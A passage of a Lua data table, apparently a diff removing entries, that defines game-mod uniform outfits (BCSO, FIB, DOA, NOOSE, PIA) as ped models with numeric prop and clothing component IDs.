}, - { 4, 55, 4 }, - { 6, 37, 1 }, - { 7, 9, 2 }, - { 9, 8, 2 }, - { 5, 67, 2 }, - } - }, - ['Male BCSO K-9 Class B'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 11, 8 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 167, 1 }, - { 3, 5, 1 }, - { 10, 12, 2 }, - { 8, 39, 1 }, - { 4, 88, 8 }, - { 6, 26, 1 }, - { 7, 9, 1 }, - { 9, 15, 1 }, - { 5, 49, 1 }, - } - }, - ['Male BCSO K-9 Class C'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 11, 8 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 184, 1 }, - { 3, 1, 1 }, - { 10, 16, 8 }, - { 8, 39, 1 }, - { 4, 88, 8 }, - { 6, 26, 1 }, - { 7, 9, 1 }, - { 9, 15, 1 }, - { 5, 49, 1 }, - } - }, - ['Female BCSO K-9 Class B'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 11, 8 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 164, 1 }, - { 3, 4, 1 }, - { 10, 11, 2 }, - { 8, 52, 1 }, - { 4, 91, 8 }, - { 6, 26, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female BCSO K-9 Class C'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 11, 8 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 186, 1 }, - { 3, 15, 1 }, - { 10, 15, 8 }, - { 8, 52, 1 }, - { 4, 91, 8 }, - { 6, 26, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Male BCSO Riot Gear'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 126, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 167, 1 }, - { 3, 32, 1 }, - { 10, 1, 1 }, - { 8, 39, 1 }, - { 4, 88, 8 }, - { 6, 25, 1 }, - { 7, 9, 1 }, - { 9, 13, 2 }, - { 5, 49, 1 }, - } - }, - ['Female BCSO Riot Gear'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 125, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 164, 1 }, - { 3, 40, 1 }, - { 10, 1, 1 }, - { 8, 52, 1 }, - { 4, 91, 8 }, - { 6, 25, 1 }, - { 7, 9, 1 }, - { 9, 12, 2 }, - { 5, 49, 1 }, - } - }, - ['Male BCSO SWAT Uniform'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 76, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 53, 1 }, - { 11, 50, 2 }, - { 3, 97, 1 }, - { 10, 7, 1 }, - { 8, 16, 1 }, - { 4, 32, 2 }, - { 6, 26, 1 }, - { 7, 111, 1 }, - { 9, 28, 1 }, - { 5, 49, 1 }, - } - }, - ['Female BCSO SWAT Uniform'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 75, 2 }, - { 1, 26, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 43, 2 }, - { 3, 112, 1 }, - { 10, 12, 4 }, - { 8, 16, 1 }, - { 4, 31, 2 }, - { 6, 26, 1 }, - { 7, 82, 1 }, - { 9, 30, 1 }, - { 5, 49, 1 }, - } - }, - ['Male BCSO Pilot Uniform'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 80, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 66, 3 }, - { 3, 97, 1 }, - { 10, 9, 4 }, - { 8, 44, 3 }, - { 4, 39, 3 }, - { 6, 25, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female BCSO Pilot Uniform'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 79, 3 }, - { 1, 14, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 60, 3 }, - { 3, 37, 1 }, - { 10, 8, 4 }, - { 8, 31, 3 }, - { 4, 39, 3 }, - { 6, 25, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Male BCSO Vintage Class A'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 34, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 201, 16 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 45, 1 }, - { 4, 11, 16 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 55, 1 }, - } - }, - ['Male BCSO Vintage Class B'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 34, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 17 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 45, 1 }, - { 4, 11, 16 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 55, 1 }, - } - }, - ['Male BCSO Vintage Class C'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 34, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 191, 17 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 45, 1 }, - { 4, 11, 16 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 55, 1 }, - } - }, - ['Female BCSO Vintage Class A'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 33, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 203, 16 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 53, 1 }, - { 4, 4, 15 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 55, 1 }, - } - }, - ['Female BCSO Vintage Class B'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 33, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 17 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 53, 1 }, - { 4, 4, 15 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 55, 1 }, - } - }, - ['Female BCSO Vintage Class C'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 33, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 17 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 53, 1 }, - { 4, 4, 15 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 55, 1 }, - } - }, - ['Male BCSO Vintage Jacket'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 34, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 157, 6 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 66, 19 }, - { 4, 11, 16 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 3, 2 }, - { 5, 49, 1 }, - } - }, - ['Female BCSO Vintage Jacket'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 33, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 154, 6 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 47, 19 }, - { 4, 4, 15 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 3, 2 }, - { 5, 49, 1 }, - } - }, - ['Male BCSO Vintage Coat'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 31, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 18, 1 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 45, 1 }, - { 4, 11, 16 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 20, 10 }, - { 5, 49, 1 }, - } - }, - ['Female BCSO Vintage Coat'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 33, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 22, 1 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 53, 1 }, - { 4, 4, 15 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 32, 10 }, - { 5, 49, 1 }, - } - }, - ['Male BCSO Vintage Motorcycle'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 18, 5 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 191, 17 }, - { 3, 20, 1 }, - { 10, 1, 1 }, - { 8, 45, 1 }, - { 4, 33, 4 }, - { 6, 14, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 55, 1 }, - } - }, - ['Female BCSO Vintage Motorcycle'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 18, 5 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 17 }, - { 3, 32, 1 }, - { 10, 1, 1 }, - { 8, 53, 1 }, - { 4, 32, 4 }, - { 6, 10, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 55, 1 }, - } - }, - ['Male FIB Suit'] = { - category = 'FIB', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 5, 5 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 11, 4 }, - { 4, 11, 5 }, - { 6, 11, 1 }, - { 7, 39, 7 }, - { 9, 23, 1 }, - { 5, 1, 1 }, - } - }, - ['Male FIB Agent'] = { - category = 'FIB', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 13, 4 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 17, 1 }, - { 4, 11, 5 }, - { 6, 11, 1 }, - { 7, 39, 7 }, - { 9, 23, 1 }, - { 5, 1, 1 }, - } - }, - ['Female FIB Agent'] = { - category = 'FIB', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 28, 1 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 10, 1 }, - { 4, 4, 1 }, - { 6, 30, 1 }, - { 7, 1, 1 }, - { 9, 25, 1 }, - { 5, 1, 1 }, - } - }, - ['Male FIB Response'] = { - category = 'FIB', - ped = 'mp_m_freemode_01', - props = { - { 0, 11, 5 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 4, 4 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 21, 3 }, - { 4, 11, 5 }, - { 6, 11, 1 }, - { 7, 9, 1 }, - { 9, 19, 7 }, - { 5, 49, 1 }, - } - }, - ['Male FIB Windbreaker'] = { - category = 'FIB', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 36, 1 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 11, 4 }, - { 4, 11, 5 }, - { 6, 11, 1 }, - { 7, 39, 7 }, - { 9, 1, 1 }, - { 5, 59, 1 }, - } - }, - ['Female FIB Windbreaker'] = { - category = 'FIB', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 180, 1 }, - { 3, 8, 1 }, - { 10, 1, 1 }, - { 8, 40, 1 }, - { 4, 4, 1 }, - { 6, 30, 1 }, - { 7, 1, 1 }, - { 9, 25, 1 }, - { 5, 1, 1 }, - } - }, - ['Male FIB Agent Winter'] = { - category = 'FIB', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 39, 1 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 11, 4 }, - { 4, 11, 5 }, - { 6, 11, 1 }, - { 7, 39, 7 }, - { 9, 23, 1 }, - { 5, 1, 1 }, - } - }, - ['Female FIB Agent Winter'] = { - category = 'FIB', - ped = 'mp_f_freemode_01', - props = { - { 0, 6, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 165, 5 }, - { 3, 45, 1 }, - { 10, 1, 1 }, - { 8, 40, 1 }, - { 4, 4, 1 }, - { 6, 26, 1 }, - { 7, 1, 1 }, - { 9, 25, 1 }, - { 5, 1, 1 }, - } - }, - ['Male FIB Field Agent'] = { - category = 'FIB', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 3, 4 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 89, 1 }, - { 4, 50, 4 }, - { 6, 26, 1 }, - { 7, 7, 1 }, - { 9, 23, 1 }, - { 5, 1, 1 }, - } - }, - ['Male FIB Task Force'] = { - category = 'FIB', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 122, 1 }, - { 11, 52, 1 }, - { 3, 31, 1 }, - { 10, 1, 1 }, - { 8, 117, 1 }, - { 4, 50, 4 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 8, 3 }, - { 5, 67, 1 }, - } - }, - ['Female FIB Task Force'] = { - category = 'FIB', - ped = 'mp_f_freemode_01', - props = { - { 0, 11, 4 }, - { 1, 26, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 122, 1 }, - { 11, 45, 1 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 79, 1 }, - { 4, 90, 7 }, - { 6, 37, 1 }, - { 7, 2, 1 }, - { 9, 8, 3 }, - { 5, 67, 1 }, - } - }, - ['Male FIB Police Class A'] = { - category = 'FIB', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 201, 12 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 38, 1 }, - { 4, 36, 1 }, - { 6, 55, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 35, 1 }, - } - }, - ['Male FIB Police Class B'] = { - category = 'FIB', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 12 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 38, 1 }, - { 4, 87, 13 }, - { 6, 55, 1 }, - { 7, 9, 1 }, - { 9, 14, 1 }, - { 5, 35, 1 }, - } - }, - ['Male FIB Police Class C'] = { - category = 'FIB', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 191, 12 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 38, 1 }, - { 4, 87, 13 }, - { 6, 55, 1 }, - { 7, 9, 1 }, - { 9, 14, 1 }, - { 5, 35, 1 }, - } - }, - ['Female FIB Police Class A'] = { - category = 'FIB', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 203, 12 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 3, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 35, 1 }, - } - }, - ['Female FIB Police Class B'] = { - category = 'FIB', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 12 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 3, 1 }, - { 4, 90, 13 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 35, 1 }, - } - }, - ['Female FIB Police Class C'] = { - category = 'FIB', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 12 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 3, 1 }, - { 4, 90, 13 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 35, 1 }, - } - }, - ['Male FIB ATU Uniform'] = { - category = 'FIB', - ped = 'mp_m_freemode_01', - props = { - { 0, 40, 1 }, - { 1, 24, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 50, 2 }, - { 3, 17, 1 }, - { 10, 14, 1 }, - { 8, 16, 1 }, - { 4, 32, 5 }, - { 6, 36, 1 }, - { 7, 43, 1 }, - { 9, 28, 4 }, - { 5, 49, 1 }, - } - }, - ['Female FIB ATU Uniform'] = { - category = 'FIB', - ped = 'mp_f_freemode_01', - props = { - { 0, 39, 1 }, - { 1, 26, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 43, 2 }, - { 3, 18, 1 }, - { 10, 13, 1 }, - { 8, 16, 1 }, - { 4, 31, 5 }, - { 6, 37, 2 }, - { 7, 30, 1 }, - { 9, 30, 4 }, - { 5, 49, 1 }, - } - }, - ['Male DOA Suit'] = { - category = 'DOA', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 5, 5 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 12, 8 }, - { 4, 11, 5 }, - { 6, 11, 1 }, - { 7, 1, 1 }, - { 9, 23, 3 }, - { 5, 67, 1 }, - } - }, - ['Female DOA Suit'] = { - category = 'DOA', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 25, 5 }, - { 3, 8, 1 }, - { 10, 1, 1 }, - { 8, 40, 1 }, - { 4, 4, 3 }, - { 6, 30, 1 }, - { 7, 1, 1 }, - { 9, 25, 3 }, - { 5, 67, 1 }, - } - }, - ['Male DOA Agent'] = { - category = 'DOA', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 4, 8 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 11, 5 }, - { 6, 11, 1 }, - { 7, 7, 1 }, - { 9, 23, 3 }, - { 5, 49, 1 }, - } - }, - ['Female DOA Agent'] = { - category = 'DOA', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 28, 1 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 8, 1 }, - { 4, 4, 3 }, - { 6, 30, 1 }, - { 7, 7, 1 }, - { 9, 25, 3 }, - { 5, 1, 1 }, - } - }, - ['Male DOA Response'] = { - category = 'DOA', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 122, 1 }, - { 11, 4, 8 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 132, 9 }, - { 4, 11, 5 }, - { 6, 11, 1 }, - { 7, 7, 1 }, - { 9, 23, 3 }, - { 5, 49, 1 }, - } - }, - ['Male DOA Windbreaker'] = { - category = 'DOA', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 37, 3 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 12, 8 }, - { 4, 11, 5 }, - { 6, 11, 1 }, - { 7, 7, 1 }, - { 9, 6, 5 }, - { 5, 59, 2 }, - } - }, - ['Female DOA Windbreaker'] = { - category = 'DOA', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 169, 3 }, - { 3, 8, 1 }, - { 10, 1, 1 }, - { 8, 40, 1 }, - { 4, 4, 3 }, - { 6, 30, 1 }, - { 7, 7, 1 }, - { 9, 25, 3 }, - { 5, 1, 1 }, - } - }, - ['Male DOA Agent Winter'] = { - category = 'DOA', - ped = 'mp_m_freemode_01', - props = { - { 0, 3, 4 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 168, 7 }, - { 3, 39, 1 }, - { 10, 1, 1 }, - { 8, 12, 8 }, - { 4, 11, 5 }, - { 6, 11, 1 }, - { 7, 1, 1 }, - { 9, 22, 5 }, - { 5, 67, 1 }, - } - }, - ['Female DOA Agent Winter'] = { - category = 'DOA', - ped = 'mp_f_freemode_01', - props = { - { 0, 6, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 165, 12 }, - { 3, 45, 1 }, - { 10, 1, 1 }, - { 8, 40, 1 }, - { 4, 4, 3 }, - { 6, 26, 1 }, - { 7, 1, 1 }, - { 9, 25, 3 }, - { 5, 67, 1 }, - } - }, - ['Male DOA Field Agent'] = { - category = 'DOA', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 3, 5 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 89, 1 }, - { 4, 1, 5 }, - { 6, 9, 3 }, - { 7, 7, 1 }, - { 9, 23, 3 }, - { 5, 1, 1 }, - } - }, - ['Male DOA Task Force'] = { - category = 'DOA', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 122, 1 }, - { 11, 209, 15 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 117, 2 }, - { 4, 1, 2 }, - { 6, 64, 5 }, - { 7, 2, 1 }, - { 9, 8, 5 }, - { 5, 67, 1 }, - } - }, - ['Female DOA Task Force'] = { - category = 'DOA', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 76, 2 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 81, 2 }, - { 4, 52, 5 }, - { 6, 51, 1 }, - { 7, 2, 1 }, - { 9, 8, 4 }, - { 5, 1, 1 }, - } - }, - ['Male DOA SRT Uniform'] = { - category = 'DOA', - ped = 'mp_m_freemode_01', - props = { - { 0, 89, 1 }, - { 1, 23, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 53, 1 }, - { 11, 50, 3 }, - { 3, 97, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 32, 3 }, - { 6, 26, 1 }, - { 7, 111, 1 }, - { 9, 28, 5 }, - { 5, 49, 1 }, - } - }, - ['Female DOA SRT Uniform'] = { - category = 'DOA', - ped = 'mp_f_freemode_01', - props = { - { 0, 88, 1 }, - { 1, 24, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 43, 3 }, - { 3, 112, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 31, 3 }, - { 6, 26, 1 }, - { 7, 82, 1 }, - { 9, 30, 5 }, - { 5, 49, 1 }, - } - }, - ['Male NOOSE SEP Class B'] = { - category = 'NOOSE', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 16 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 38, 1 }, - { 4, 87, 13 }, - { 6, 26, 1 }, - { 7, 9, 1 }, - { 9, 31, 1 }, - { 5, 49, 1 }, - } - }, - ['Male NOOSE SEP Class C'] = { - category = 'NOOSE', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 191, 16 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 38, 1 }, - { 4, 87, 13 }, - { 6, 26, 1 }, - { 7, 9, 1 }, - { 9, 31, 1 }, - { 5, 49, 1 }, - } - }, - ['Female NOOSE SEP Class B'] = { - category = 'NOOSE', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 16 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 3, 1 }, - { 4, 90, 13 }, - { 6, 26, 1 }, - { 7, 9, 1 }, - { 9, 35, 1 }, - { 5, 49, 1 }, - } - }, - ['Female NOOSE SEP Class C'] = { - category = 'NOOSE', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 16 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 3, 1 }, - { 4, 90, 13 }, - { 6, 26, 1 }, - { 7, 9, 1 }, - { 9, 35, 1 }, - { 5, 49, 1 }, - } - }, - ['Male PIA Suit'] = { - category = 'NOOSE', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 5, 5 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 12, 1 }, - { 4, 11, 5 }, - { 6, 11, 1 }, - { 7, 14, 1 }, - { 9, 23, 2 }, - { 5, 67, 1 }, - } - }, - ['Female PIA Suit'] = { - category = 'NOOSE', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 25, 4 }, - { 3, 8, 1 }, - { 10, 1, 1 }, - { 8, 40, 3 }, - { 4, 4, 5 }, - { 6, 30, 1 }, - { 7, 1, 1 }, - { 9, 21, 6 }, - { 5, 67, 1 }, - } - }, - ['Male PIA Special Agent'] = { - category = 'NOOSE', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 